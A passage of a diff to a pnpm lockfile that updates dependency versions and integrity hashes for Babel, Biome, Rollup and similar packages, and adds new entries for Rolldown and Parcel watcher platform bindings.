sha512-IyDgFV5GeDUVX4YdF/3CPULtVGSXXMLh1xVIgdCgxApktqnQV0r7/8Nqthg+8YLGaAtdyIlo2qIdZrbCv4+7ww==} + '@babel/parser@7.29.7': + resolution: {integrity: sha512-hnORnjP/1P/zFEndoeX+n+t1RwWRJiJpM/jO7FW32Kn9r5+sJB2JWOdYo4L6k78j15eCwY3Gm/7364B1EMwtNg==} engines: {node: '>=6.0.0'} hasBin: true - '@babel/types@7.29.0': - resolution: {integrity: sha512-LwdZHpScM4Qz8Xw2iKSzS+cfglZzJGvofQICy7W7v4caru4EaAmyUuO6BGrbyQ2mYV11W0U8j5mBhd14dd3B0A==} + '@babel/types@7.29.7': + resolution: {integrity: sha512-4zBIxpPzowiZpusoFkyGVwakdRJUyuH5PxQ/PrqghfdFWWasvnCdPfQXHrenDai+gyLARulZjZowCOj6fjT4pA==} engines: {node: '>=6.9.0'} - '@biomejs/biome@1.9.4': - resolution: {integrity: sha512-1rkd7G70+o9KkTn5KLmDYXihGoTaIGO9PIIN2ZB7UJxFrWw04CZHPYiMRjYsaDvVV7hP1dYNRLxSANLaBFGpog==} + '@biomejs/biome@2.5.2': + resolution: {integrity: sha512-VQ3RCqr7JmDIX+w6stWYl+g/3bYofN3q2wDBHUKKc/c7i5QWrFKFBZYCYPWTE6agsUPMIZZe6/CMmVUfUAhkKA==} engines: {node: '>=14.21.3'} hasBin: true - '@biomejs/cli-darwin-arm64@1.9.4': - resolution: {integrity: sha512-bFBsPWrNvkdKrNCYeAp+xo2HecOGPAy9WyNyB/jKnnedgzl4W4Hb9ZMzYNbf8dMCGmUdSavlYHiR01QaYR58cw==} + '@biomejs/cli-darwin-arm64@2.5.2': + resolution: {integrity: sha512-e7P3P7EkwFc/KiX2AHw4YDLIBOMfG9CPCAwy52k5Bp0dfhkozx9hf6wCmIr2QeXy2XeccJ3V/Sg+hDmzYEqxSg==} engines: {node: '>=14.21.3'} cpu: [arm64] os: [darwin] - '@biomejs/cli-darwin-x64@1.9.4': - resolution: {integrity: sha512-ngYBh/+bEedqkSevPVhLP4QfVPCpb+4BBe2p7Xs32dBgs7rh9nY2AIYUL6BgLw1JVXV8GlpKmb/hNiuIxfPfZg==} + '@biomejs/cli-darwin-x64@2.5.2': + resolution: {integrity: sha512-ymzMvjC1Jg0b9K0D26ZdARqFQXs7MocfLC5FOCGfkC0Ss+ACUJkX5364ZM5nT4NLZanHRZNVrZEy+Ibwcvux/g==} engines: {node: '>=14.21.3'} cpu: [x64] os: [darwin] - '@biomejs/cli-linux-arm64-musl@1.9.4': - resolution: {integrity: sha512-v665Ct9WCRjGa8+kTr0CzApU0+XXtRgwmzIf1SeKSGAv+2scAlW6JR5PMFo6FzqqZ64Po79cKODKf3/AAmECqA==} + '@biomejs/cli-linux-arm64-musl@2.5.2': + resolution: {integrity: sha512-w+ANG0ZvTu9IeEg9QnstoOnk6L0fpwJifW6aHR18+cb5Z39bkANItYjAfMrnvce5tmMK+IQ6nPX7/kQFdam5iw==} engines: {node: '>=14.21.3'} cpu: [arm64] os: [linux] + libc: [musl] - '@biomejs/cli-linux-arm64@1.9.4': - resolution: {integrity: sha512-fJIW0+LYujdjUgJJuwesP4EjIBl/N/TcOX3IvIHJQNsAqvV2CHIogsmA94BPG6jZATS4Hi+xv4SkBBQSt1N4/g==} + '@biomejs/cli-linux-arm64@2.5.2': + resolution: {integrity: sha512-t7sseOmqND57uUWTwlawU6BYj+J06T/9EkydzBhkrgw/FK3QVhjU2wsJR0frljrKZ0/I8A/rYw7284QgqjQfIQ==} engines: {node: '>=14.21.3'} cpu: [arm64] os: [linux] + libc: [glibc] - '@biomejs/cli-linux-x64-musl@1.9.4': - resolution: {integrity: sha512-gEhi/jSBhZ2m6wjV530Yy8+fNqG8PAinM3oV7CyO+6c3CEh16Eizm21uHVsyVBEB6RIM8JHIl6AGYCv6Q6Q9Tg==} + '@biomejs/cli-linux-x64-musl@2.5.2': + resolution: {integrity: sha512-VArNLAzND063tF+XY0yPyM+DyahpzOMzOAvb7qs259nhjJWRjvjZdssuA+Rfl+l07+NOesKZ0Xu2yFrXyBMtzw==} engines: {node: '>=14.21.3'} cpu: [x64] os: [linux] + libc: [musl] - '@biomejs/cli-linux-x64@1.9.4': - resolution: {integrity: sha512-lRCJv/Vi3Vlwmbd6K+oQ0KhLHMAysN8lXoCI7XeHlxaajk06u7G+UsFSO01NAs5iYuWKmVZjmiOzJ0OJmGsMwg==} + '@biomejs/cli-linux-x64@2.5.2': + resolution: {integrity: sha512-M/lOZrewzTCRDINbjhQ1gYYru37KlD3kJBQwwKCG0ckz5E9IZwIoJ3X0wBwRXA+yBDIwWUuPBHS67HzJY4dTfA==} engines: {node: '>=14.21.3'} cpu: [x64] os: [linux] + libc: [glibc] - '@biomejs/cli-win32-arm64@1.9.4': - resolution: {integrity: sha512-tlbhLk+WXZmgwoIKwHIHEBZUwxml7bRJgk0X2sPyNR3S93cdRq6XulAZRQJ17FYGGzWne0fgrXBKpl7l4M87Hg==} + '@biomejs/cli-win32-arm64@2.5.2': + resolution: {integrity: sha512-kbjFFKyZlzYnAuw7sRy5qDoFG6zrP40UK08oPQsWK0ct3NMnGSt+Bs1iviEEyEIP57N5MrykGXdO/wRiaR4lww==} engines: {node: '>=14.21.3'} cpu: [arm64] os: [win32] - '@biomejs/cli-win32-x64@1.9.4': - resolution: {integrity: sha512-8Y5wMhVIPaWe6jw2H+KlEm4wP/f7EW3810ZLmDlrEEy5KvBsb9ECEfu/kMWD484ijfQ8+nIi0giMgu9g1UAuuA==} + '@biomejs/cli-win32-x64@2.5.2': + resolution: {integrity: sha512-4InchVpdVmdkkkgjQqKpgvyu+VPnoF/7RPSw5YATgEVpt2j72wcCAeV5TwaE9ZGJUZWZn7v2CwSAj6CrMJEx8A==} engines: {node: '>=14.21.3'} cpu: [x64] os: [win32] - '@ctrl/tinycolor@3.6.1': - resolution: {integrity: sha512-SITSV6aIXsuVNV3f3O0f2n/cgyEDWoSqtZMYiAmcsYHydcKrOz3gUxB/iXd/Qf08+IZX4KpgNbvUdMBmWz+kcA==} - engines: {node: '>=10'} + '@ctrl/tinycolor@4.2.0': + resolution: {integrity: sha512-kzyuwOAQnXJNLS9PSyrk0CWk35nWJW/zl/6KvnTBMFK65gm7U1/Z5BqjxeapjZCIhQcM/DsrEmcbRwDyXyXK4A==} + engines: {node: '>=14'} '@docsearch/css@3.8.2': resolution: {integrity: sha512-y05ayQFyUmCXze79+56v/4HpycYF3uFqB78pLPrSV5ZKAlDuIAAJNhaRi8tTdRNXh05yxX/TyNnzD6LwSM89vQ==} @@ -244,6 +248,15 @@ packages: peerDependencies: vue: ^3.2.0 + '@emnapi/core@1.11.1': + resolution: {integrity: sha512-RSvbQmHzdKzNsLYa/wHrbc3KN4sYLKAdPZxqiM2HATqv/SBk2/ENSHpvXGaLOMcsAyz0poEGqkmmKYG3OWiJEQ==} + + '@emnapi/runtime@1.11.1': + resolution: {integrity: sha512-vgj7R3y3Wgx24IQaGPA/R6YFXLHVMOZ0uVEyIQPaWs+rd1AzfEMXlAC22FYwO1XkKR6NPsq7mUandH8oIRdZFw==} + + '@emnapi/wasi-threads@1.2.2': + resolution: {integrity: sha512-c95qOXkHdydNKhscBTebqEC1CVAZpyqOfVfBzQ1qgzyl3gfeldUjIggDbIZgDKsHLgnsM+igH7TJ/eAasaVuMA==} + '@esbuild/aix-ppc64@0.21.5': resolution: {integrity: sha512-1SDgH6ZSPTlggy1yI6+Dbkiz8xzpHJEVAlF/AM1tHPLsf5STom9rwtjE4hKAF20FfXXNTFqEYXyJNWh1GiZedQ==} engines: {node: '>=12'} @@ -382,169 +395,441 @@ packages: cpu: [x64] os: [win32] - '@floating-ui/core@1.7.3': - resolution: {integrity: sha512-sGnvb5dmrJaKEZ+LDIpguvdX3bDlEllmv4/ClQ9awcmCZrlx5jQyyMWFM5kBI+EyNOCDDiKk8il0zeuX3Zlg/w==} + '@floating-ui/core@1.7.5': + resolution: {integrity: sha512-1Ih4WTWyw0+lKyFMcBHGbb5U5FtuHJuujoyyr5zTaWS5EYMeT6Jb2AuDeftsCsEuchO+mM2ij5+q9crhydzLhQ==} - '@floating-ui/dom@1.7.4': - resolution: {integrity: sha512-OOchDgh4F2CchOX94cRVqhvy7b3AFb+/rQXyswmzmGakRfkMgoWVjfnLWkRirfLEfuD4ysVW16eXzwt3jHIzKA==} + '@floating-ui/dom@1.7.6': + resolution: {integrity: sha512-9gZSAI5XM36880PPMm//9dfiEngYoC6Am2izES1FF406YFsjvyBMmeJ2g4SAju3xWwtuynNRFL2s9hgxpLI5SQ==} - '@floating-ui/utils@0.2.10': - resolution: {integrity: sha512-aGTxbpbg8/b5JfU1HXSrbH3wXZuLPJcNEcZQFMxLs3oSzgtVu6nFPkbbGGUvBcUjKV2YyB9Wxxabo+HEH9tcRQ==} + '@floating-ui/utils@0.2.11': + resolution: {integrity: sha512-RiB/yIh78pcIxl6lLMG0CgBXAZ2Y0eVHqMPYugu+9U0AeT6YBeiJpf7lbdJNIugFP5SIjwNRgo4DhR1Qxi26Gg==} '@giscus/vue@3.1.1': resolution: {integrity: sha512-xgsc93MibRQ0d1glBxN1BrEREHTIf3BPYs/3R+UZHNqawFFoWBV6iJ7uVCXMqoEKZdE2c78B3aKt5gfGqo8I5A==} peerDependencies: vue: '>=3.2.0' - '@iconify-json/simple-icons@1.2.67': - resolution: {integrity: sha512-RGJRwlxyup54L1UDAjCshy3ckX5zcvYIU74YLSnUgHGvqh6B4mvksbGNHAIEp7dZQ6cM13RZVT5KC07CmnFNew==} + '@iconify-json/simple-icons@1.2.88': + resolution: {integrity: sha512-+cvi1qCuvReL29ehi6t62L4fb7GDXe+UlGHFcsJcV7I2l9wtqn9XE2IBKcDr3CI5iGUGS5ISnXv699pSGpyx1Q==} '@iconify/types@2.0.0': resolution: {integrity: sha512-+wluvCrRhXrhyOmRDJ3q8mux9JkKy5SJ/v8ol2tu4FVjyYvtEzkc/3pK15ET6RKg4b4w4BmTk1+gsCUhf21Ykg==} + '@jridgewell/gen-mapping@0.3.13': + resolution: {integrity: sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==} + + '@jridgewell/remapping@2.3.5': + resolution: {integrity: sha512-LI9u/+laYG4Ds1TDKSJW2YPrIlcVYOwi2fUC6xB43lueCjgxV4lffOCZCtYFiH6TNOX+tQKXx97T4IKHbhyHEQ==} + + '@jridgewell/resolve-uri@3.1.2': + resolution: {integrity: sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==} + engines: {node: '>=6.0.0'} + '@jridgewell/sourcemap-codec@1.5.5': resolution: {integrity: sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==} - '@lit-labs/ssr-dom-shim@1.5.1': - resolution: {integrity: sha512-Aou5UdlSpr5whQe8AA/bZG0jMj96CoJIWbGfZ91qieWu5AWUMKw8VR/pAkQkJYvBNhmCcWnZlyyk5oze8JIqYA==} + '@jridgewell/trace-mapping@0.3.31': + resolution: {integrity: sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==} + + '@lit-labs/ssr-dom-shim@1.6.0': + resolution: {integrity: sha512-VHb0ALPMTlgKjM6yIxxoQNnpKyUKLD04VzeQdsiXkMqkvYlAHxq9glGLmgbb889/1GsohSOAjvQYoiBppXFqrQ==} '@lit/reactive-element@2.1.2': resolution: {integrity: sha512-pbCDiVMnne1lYUIaYNN5wrwQXDtHaYtg7YEFPeW+hws6U47WeFvISGUWekPGKWOP1ygrs0ef0o1VJMk1exos5A==} - '@rollup/pluginutils@5.3.0': - resolution: {integrity: sha512-5EdhGZtnu3V88ces7s53hhfK5KSASnJZv8Lulpc04cWO3REESroJXg73DFsOmgbU2BhwV0E20bu2IDZb3VKW4Q==} - engines: {node: '>=14.0.0'} + '@napi-rs/wasm-runtime@1.1.6': + resolution: {integrity: sha512-ZLv/JdUfkvOy9eCnnBaGfiO+XimbjebAeO+MRQqD/B+FR1tnRN0tpKSJHRbE8sFfS6aqsXZ67TQjfwfsxULVbg==} peerDependencies: - rollup: ^1.20.0||^2.0.0||^3.0.0||^4.0.0 - peerDependenciesMeta: - rollup: - optional: true + '@emnapi/core': ^1.7.1 + '@emnapi/runtime': ^1.7.1 + + '@nuxt/kit@4.4.8': + resolution: {integrity: sha512-ZUlZ5iYfyfJFDPluhn6ZxFWcsuxWbLnZBc8w3MAROcQ4lYfZ+qFpALBLSNlpc0zhOa++33EE+5PEbOAdVIY+dw==} + engines: {node: '>=18.12.0'} + + '@oxc-project/types@0.138.0': + resolution: {integrity: sha512-1a7ZKmrRTCoN1XMZ4L0PyyqrMnrNlLyPuOkdSX2MZg7IiIGRUyurNhAm73ptDOraoBcIordsIGKNPKUzy3ZmfA==} + + '@parcel/watcher-android-arm64@2.5.6': + resolution: {integrity: sha512-YQxSS34tPF/6ZG7r/Ih9xy+kP/WwediEUsqmtf0cuCV5TPPKw/PQHRhueUo6JdeFJaqV3pyjm0GdYjZotbRt/A==} + engines: {node: '>= 10.0.0'} + cpu: [arm64] + os: [android] + + '@parcel/watcher-darwin-arm64@2.5.6': + resolution: {integrity: sha512-Z2ZdrnwyXvvvdtRHLmM4knydIdU9adO3D4n/0cVipF3rRiwP+3/sfzpAwA/qKFL6i1ModaabkU7IbpeMBgiVEA==} + engines: {node: '>= 10.0.0'} + cpu: [arm64] + os: [darwin] + + '@parcel/watcher-darwin-x64@2.5.6': + resolution: {integrity: sha512-HgvOf3W9dhithcwOWX9uDZyn1lW9R+7tPZ4sug+NGrGIo4Rk1hAXLEbcH1TQSqxts0NYXXlOWqVpvS1SFS4fRg==} + engines: {node: '>= 10.0.0'} + cpu: [x64] + os: [darwin] + + '@parcel/watcher-freebsd-x64@2.5.6': + resolution: {integrity: sha512-vJVi8yd/qzJxEKHkeemh7w3YAn6RJCtYlE4HPMoVnCpIXEzSrxErBW5SJBgKLbXU3WdIpkjBTeUNtyBVn8TRng==} + engines: {node: '>= 10.0.0'} + cpu: [x64] + os: [freebsd] + + '@parcel/watcher-linux-arm-glibc@2.5.6': + resolution: {integrity: sha512-9JiYfB6h6BgV50CCfasfLf/uvOcJskMSwcdH1PHH9rvS1IrNy8zad6IUVPVUfmXr+u+Km9IxcfMLzgdOudz9EQ==} + engines: {node: '>= 10.0.0'} + cpu: [arm] + os: [linux] + libc: [glibc] - '@rollup/rollup-android-arm-eabi@4.59.0': - resolution: {integrity: sha512-upnNBkA6ZH2VKGcBj9Fyl9IGNPULcjXRlg0LLeaioQWueH30p6IXtJEbKAgvyv+mJaMxSm1l6xwDXYjpEMiLMg==} + '@parcel/watcher-linux-arm-musl@2.5.6': + resolution: {integrity: sha512-Ve3gUCG57nuUUSyjBq/MAM0CzArtuIOxsBdQ+ftz6ho8n7s1i9E1Nmk/xmP323r2YL0SONs1EuwqBp2u1k5fxg==} + engines: {node: '>= 10.0.0'} cpu: [arm] + os: [linux] + libc: [musl] + + '@parcel/watcher-linux-arm64-glibc@2.5.6': + resolution: {integrity: sha512-f2g/DT3NhGPdBmMWYoxixqYr3v/UXcmLOYy16Bx0TM20Tchduwr4EaCbmxh1321TABqPGDpS8D/ggOTaljijOA==} + engines: {node: '>= 10.0.0'} + cpu: [arm64] + os: [linux] + libc: [glibc] + + '@parcel/watcher-linux-arm64-musl@2.5.6': + resolution: {integrity: sha512-qb6naMDGlbCwdhLj6hgoVKJl2odL34z2sqkC7Z6kzir8b5W65WYDpLB6R06KabvZdgoHI/zxke4b3zR0wAbDTA==} + engines: {node: '>= 10.0.0'} + cpu: [arm64] + os: [linux] + libc: [musl] + + '@parcel/watcher-linux-x64-glibc@2.5.6': + resolution: {integrity: sha512-kbT5wvNQlx7NaGjzPFu8nVIW1rWqV780O7ZtkjuWaPUgpv2NMFpjYERVi0UYj1msZNyCzGlaCWEtzc+exjMGbQ==} + engines: {node: '>= 10.0.0'} + cpu: [x64] + os: [linux] + libc: [glibc] + + '@parcel/watcher-linux-x64-musl@2.5.6': + resolution: {integrity: sha512-1JRFeC+h7RdXwldHzTsmdtYR/Ku8SylLgTU/reMuqdVD7CtLwf0VR1FqeprZ0eHQkO0vqsbvFLXUmYm/uNKJBg==} + engines: {node: '>= 10.0.0'} + cpu: [x64] + os: [linux] + libc: [musl] + + '@parcel/watcher-win32-arm64@2.5.6': + resolution: {integrity: sha512-3ukyebjc6eGlw9yRt678DxVF7rjXatWiHvTXqphZLvo7aC5NdEgFufVwjFfY51ijYEWpXbqF5jtrK275z52D4Q==} + engines: {node: '>= 10.0.0'} + cpu: [arm64] + os: [win32] + + '@parcel/watcher-win32-ia32@2.5.6': + resolution: {integrity: sha512-k35yLp1ZMwwee3Ez/pxBi5cf4AoBKYXj00CZ80jUz5h8prpiaQsiRPKQMxoLstNuqe2vR4RNPEAEcjEFzhEz/g==} + engines: {node: '>= 10.0.0'} + cpu: [ia32] + os: [win32] + + '@parcel/watcher-win32-x64@2.5.6': + resolution: {integrity: sha512-hbQlYcCq5dlAX9Qx+kFb0FHue6vbjlf0FrNzSKdYK2APUf7tGfGxQCk2ihEREmbR6ZMc0MVAD5RIX/41gpUzTw==} + engines: {node: '>= 10.0.0'} + cpu: [x64] + os: [win32] + + '@parcel/watcher@2.5.6': + resolution: {integrity: sha512-tmmZ3lQxAe/k/+rNnXQRawJ4NjxO2hqiOLTHvWchtGZULp4RyFeh6aU4XdOYBFe2KE1oShQTv4AblOs2iOrNnQ==} + engines: {node: '>= 10.0.0'} + + '@rolldown/binding-android-arm64@1.1.4': + resolution: {integrity: sha512-EZLpf/8y7GXkkra90ML47kzik/GMP3EMcE9bPyHmRfxLC6z9+aW5A8poCsoxjrT5GfEcNAAvWwUHjvP1pUQkfw==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [arm64] os: [android] - '@rollup/rollup-android-arm64@4.59.0': - resolution: {integrity: sha512-hZ+Zxj3SySm4A/DylsDKZAeVg0mvi++0PYVceVyX7hemkw7OreKdCvW2oQ3T1FMZvCaQXqOTHb8qmBShoqk69Q==} + '@rolldown/binding-darwin-arm64@1.1.4': + resolution: {integrity: sha512-aUi+HBvmYb7j8krl1+qJgkG8C17fO79gk3c+jPw4S8glRFc1DTija9S3EyaTSQUm5GJXYKDAsugBEhFHH2vYiQ==} + engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] + os: [darwin] + + '@rolldown/binding-darwin-x64@1.1.4': + resolution: {integrity: sha512-F7hHC3gwY11+vByKPRWqwGbeXWVgKmL+pTGCinaEhdihzBV2aQ0fvZOch9cXYUOKuKKq429HeYXOqQLc7wFCEg==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [x64] + os: [darwin] + + '@rolldown/binding-freebsd-x64@1.1.4': + resolution: {integrity: sha512-sI5yw+7s92SK6odiEhD5lKCBlWcpjHS5qyqpVQbZAJ0fIzEUXrmbl3DH2ybR3PZogulNJF+COLtmA8hUfvkCCQ==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [x64] + os: [freebsd] + + '@rolldown/binding-linux-arm-gnueabihf@1.1.4': + resolution: {integrity: sha512-mCi0OKgEieFircrtVYmQAFGszRtMnZ6fpZAXrxanXAu7lqZcsK1E1RAaZNG0uKAnxox3B1f4EyQNnoyMfN1vAA==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [arm] + os: [linux] + + '@rolldown/binding-linux-arm64-gnu@1.1.4': + resolution: {integrity: sha512-B9Ial3Kv5sh0SHnB1g/QWcUQCEvCF6QKGAl4zXypYj65mVI+B4AhFBwPtSN7pDrJeIx8Z7zdy4ntx+wQABom7w==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [arm64] + os: [linux] + libc: [glibc] + + '@rolldown/binding-linux-arm64-musl@1.1.4': + resolution: {integrity: sha512-lZVym0PuHE1KZ22gmFTC15lAkrg9iTszR617oYRB/iPY1A56ywoJzVKOJBKaot5RiikCObmur6pogpse3gRcng==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [arm64] + os: [linux] + libc: [musl] + + '@rolldown/binding-linux-ppc64-gnu@1.1.4': + resolution: {integrity: sha512-t2DNiLJWNTbnEHyUzTumldML6ET4/g16467LZoDDJ3tSxGvguL5/NyC2lCsNKuyRycg9XeDQF5SSv+TNOhQEXg==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [ppc64] + os: [linux] + libc: [glibc] + + '@rolldown/binding-linux-s390x-gnu@1.1.4': + resolution: {integrity: sha512-0WIRnL1Uw4BvTZRLQt+PVgo6ZKTJadlC2btP+/EOXv2f/DWbY0rEgl+y834mIVwP1FkTlWVTrGGJXf12lru7EQ==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [s390x] + os: [linux] + libc: [glibc] + + '@rolldown/binding-linux-x64-gnu@1.1.4': + resolution: {integrity: sha512-JWtGshGfX+oENAKonoNkqEJX+7hC8yfhi9GUyPX1VX4mdh1y5r+ZiJLR5XzAB0aoP6s/PcILsGjKq8O0mm24bw==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [x64] + os: [linux] + libc: [glibc] + + '@rolldown/binding-linux-x64-musl@1.1.4': + resolution: {integrity: sha512-rT6yQcxUuXs4CnbofqwHRRV0iem349rLMYpTjkgQGLjrY4ado/eDzwPZPTCgTOlF6Nkp8NEv70yLMTn6qkWxsQ==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [x64] + os: [linux] + libc: [musl] + + '@rolldown/binding-openharmony-arm64@1.1.4': + resolution: {integrity: sha512-KXMGoboq5cyaCQjDA4GLuRiOwBQ0EyFnJoVViLeZ45/3rFItRODEr+NdsBcVpll40hhNArlm/speWGRvj08LzA==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [arm64] + os: [openharmony] + + '@rolldown/binding-wasm32-wasi@1.1.4': + resolution: {integrity: sha512-5K83rb36oJiY7BCyE9zLZtGcPV4g5wvq+xwdO0XPIwDVZI8cyB/AUjkNXGb92/rnmezEkjMOpgY61rtwjQtFwg==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [wasm32] + + '@rolldown/binding-win32-arm64-msvc@1.1.4': + resolution: {integrity: sha512-PnWBtw3TV5KOg69HQQDR0mnQuyCmSGR2pAB4DC1rPF808fgKeTUMj2EOEyKATpgiuxuR5APQmiDO7PDgEjTFSA==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [arm64] + os: [win32] + + '@rolldown/binding-win32-x64-msvc@1.1.4': + resolution: {integrity: sha512-M1lpniBePobTfsa7Ks9a199e1akxsXn+GYBUKsEzv3YFzOm1HJAMNwKI3qr0Zq+mxwx9gOZoTdP1yXRYsZUocQ==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [x64] + os: [win32] + + '@rolldown/pluginutils@1.0.1': + resolution: {integrity: sha512-2j9bGt5Jh8hj+vPtgzPtl72j0yRxHAyumoo6TNfAjsLB04UtpSvPbPcDcBMxz7n+9CYB0c1GxQFxYRg2jimqGw==} + + '@rollup/rollup-android-arm-eabi@4.62.2': + resolution: {integrity: sha512-6o7ZLZK+BeenkZCFNDXqpbjw9bD6nuWonvS/lwQJp7NoVVxm6p3qE7qQ5jGuBjiFsgvqjD8mZAU5oWxTmbOeOg==} + cpu: [arm] os: [android] - '@rollup/rollup-darwin-arm64@4.59.0': - resolution: {integrity: sha512-W2Psnbh1J8ZJw0xKAd8zdNgF9HRLkdWwwdWqubSVk0pUuQkoHnv7rx4GiF9rT4t5DIZGAsConRE3AxCdJ4m8rg==} + '@rollup/rollup-android-arm64@4.62.2': + resolution: {integrity: sha512-BaH7BllCACHoH1LguOU56UItGfUWjujlO65kS9LAodViaN4bwIKd7oeW/ZHJ/4ljr/7MIiENnNy3HJ0zXv8Zkw==} + cpu: [arm64] + os: [android] + + '@rollup/rollup-darwin-arm64@4.62.2': + resolution: {integrity: sha512-v39RCCvj4He82I9sFmk+M1VZ0PLM9sfsLVikjfx2hYBNALhrrOR2D3JjQA6AhlaSOgcR+RzrKY7e1+bT6SUO/A==} cpu: [arm64] os: [darwin] - '@rollup/rollup-darwin-x64@4.59.0': - resolution: {integrity: sha512-ZW2KkwlS4lwTv7ZVsYDiARfFCnSGhzYPdiOU4IM2fDbL+QGlyAbjgSFuqNRbSthybLbIJ915UtZBtmuLrQAT/w==} + '@rollup/rollup-darwin-x64@4.62.2': + resolution: {integrity: sha512-yl0y2vq3S3lHeuXhEdss6TWfKW8vkujImO12tn4ZkG/4oghr09LvdYm2RElVjokTQiUvDUGXLGsYeLqUMCKpGA==} cpu: [x64] os: [darwin] - '@rollup/rollup-freebsd-arm64@4.59.0': - resolution: {integrity: sha512-EsKaJ5ytAu9jI3lonzn3BgG8iRBjV4LxZexygcQbpiU0wU0ATxhNVEpXKfUa0pS05gTcSDMKpn3Sx+QB9RlTTA==} + '@rollup/rollup-freebsd-arm64@4.62.2': + resolution: {integrity: sha512-tT4pvt4qXD+vEoezupCWi+a1F0vvDiksiHc+PxRlYTOH1I6/X4id9jPxTP+Fg+545euaFT1jJVs4CEdHZAU1vw==} cpu: [arm64] os: [freebsd] - '@rollup/rollup-freebsd-x64@4.59.0': - resolution: {integrity: sha512-d3DuZi2KzTMjImrxoHIAODUZYoUUMsuUiY4SRRcJy6NJoZ6iIqWnJu9IScV9jXysyGMVuW+KNzZvBLOcpdl3Vg==} + '@rollup/rollup-freebsd-x64@4.62.2': + resolution: {integrity: sha512-6nU5F2wCW+qvCBhTn1pdIU3bzsIoF7EUwsCDRxilWGprQR6yd508YnH9+OKFCwpfS8pjZqDUmnCAr7exax0XCg==} cpu: [x64] os: [freebsd] - '@rollup/rollup-linux-arm-gnueabihf@4.59.0': - resolution: {integrity: sha512-t4ONHboXi/3E0rT6OZl1pKbl2Vgxf9vJfWgmUoCEVQVxhW6Cw/c8I6hbbu7DAvgp82RKiH7TpLwxnJeKv2pbsw==} + '@rollup/rollup-linux-arm-gnueabihf@4.62.2': + resolution: {integrity: sha512-n1GJHPOvpIfhi3TmrCeh6S6URt9BFCt0KQE3qvexyGCTAKpR4Lg+eWvNZEqu7epxwus/8ElT3hacYEucm49SZg==} cpu: [arm] os: [linux] + libc: [glibc] - '@rollup/rollup-linux-arm-musleabihf@4.59.0': - resolution: {integrity: sha512-CikFT7aYPA2ufMD086cVORBYGHffBo4K8MQ4uPS/ZnY54GKj36i196u8U+aDVT2LX4eSMbyHtyOh7D7Zvk2VvA==} + '@rollup/rollup-linux-arm-musleabihf@4.62.2': + resolution: {integrity: sha512-JqgflS8wEB+UXV/vS1RpRbifGBeN4D5lz8D8oOFbFZw4vedvdOgCFAjfBmIMdW3yL10XpQQ0Ambepw6MXrhOnA==} cpu: [arm] os: [linux] + libc: [musl] - '@rollup/rollup-linux-arm64-gnu@4.59.0': - resolution: {integrity: sha512-jYgUGk5aLd1nUb1CtQ8E+t5JhLc9x5WdBKew9ZgAXg7DBk0ZHErLHdXM24rfX+bKrFe+Xp5YuJo54I5HFjGDAA==} + '@rollup/rollup-linux-arm64-gnu@4.62.2': + resolution: {integrity: sha512-wnFJkogWvN4jm/hQRF2UBaeUmk20j5+DmHvoyWii2b8HJDyvz1MF2OU/6ynXt2KR63rbZLWkFpoytpdc/yBuSA==} cpu: [arm64] os: [linux] + libc: [glibc] - '@rollup/rollup-linux-arm64-musl@4.59.0': - resolution: {integrity: sha512-peZRVEdnFWZ5Bh2KeumKG9ty7aCXzzEsHShOZEFiCQlDEepP1dpUl/SrUNXNg13UmZl+gzVDPsiCwnV1uI0RUA==} + '@rollup/rollup-linux-arm64-musl@4.62.2': + resolution: {integrity: sha512-HVu2bp0zhvJ8xHEV9+UUs7S90VadmBSY3LcIMvozbPo4AuMGDWlz3ymHLHZPX4hR67TKTt8Qp5PJ5RBg/i+RMQ==} cpu: [arm64] os: [linux] + libc: [musl] - '@rollup/rollup-linux-loong64-gnu@4.59.0': - resolution: {integrity: sha512-gbUSW/97f7+r4gHy3Jlup8zDG190AuodsWnNiXErp9mT90iCy9NKKU0Xwx5k8VlRAIV2uU9CsMnEFg/xXaOfXg==} + '@rollup/rollup-linux-loong64-gnu@4.62.2': + resolution: {integrity: sha512-mQqqAV8QaoSgr9I2fKDLY2BAVvmKjWoGiu/cSYQonsLvtqwEn1E4QYfnCOcp5zoEqNhsDYin1s6jx/VJmrxlZg==} cpu: [loong64] os: [linux] + libc: [glibc] - '@rollup/rollup-linux-loong64-musl@4.59.0': - resolution: {integrity: sha512-yTRONe79E+o0FWFijasoTjtzG9EBedFXJMl888NBEDCDV9I2wGbFFfJQQe63OijbFCUZqxpHz1GzpbtSFikJ4Q==} + '@rollup/rollup-linux-loong64-musl@4.62.2': + resolution: {integrity: sha512-IxKLoxCQ2IWi6bT2akyDUBGsOImDKB+sPp4EsTmwFQ/fMwpCKm8uLSSgP/Kx/QYUgKis6SEZ5/Nlhup0DIA0PQ==} cpu: [loong64] os: [linux] + libc: [musl] - '@rollup/rollup-linux-ppc64-gnu@4.59.0': - resolution: {integrity: sha512-sw1o3tfyk12k3OEpRddF68a1unZ5VCN7zoTNtSn2KndUE+ea3m3ROOKRCZxEpmT9nsGnogpFP9x6mnLTCaoLkA==} + '@rollup/rollup-linux-ppc64-gnu@4.62.2': + resolution: {integrity: 